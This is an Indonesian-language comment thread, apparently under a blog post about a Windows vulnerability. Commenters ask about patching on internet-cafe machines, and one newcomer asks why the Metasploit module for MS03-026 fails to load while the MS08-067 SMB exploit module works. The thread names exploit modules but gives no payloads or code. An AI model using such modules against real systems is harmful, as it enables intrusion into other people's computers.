wah, pencegahannya musti restart komputer dulu ya mas?
ga bisa di terapin di warnet donk.
kan rata2 warnet pake deepfreeze 🙁
ikut copaz ya…….
thanks
silahkan, yg penting tetap menyertakan sumber nya 🙂
mangstab om..
tapi btw kenapa ketika ane mengetikkan
msf> use msrpc_dcom_ms03_026
ko’ muncul tulisan [-] failed to load module: msrpc_dcom_ms03_026
itu kira-kira kenapa gagal meload karena apa ya pak?
ini saya pakai metasploit v3.7
kalau biasanya saya pakai
use windows_smb_ms08_067_netapi
bisa e.. hehe
hmm… bingung.. 😀
newbie mohon pencerahannya 😀
maaf salah..
windows/smb/ms08_067_netapi
😀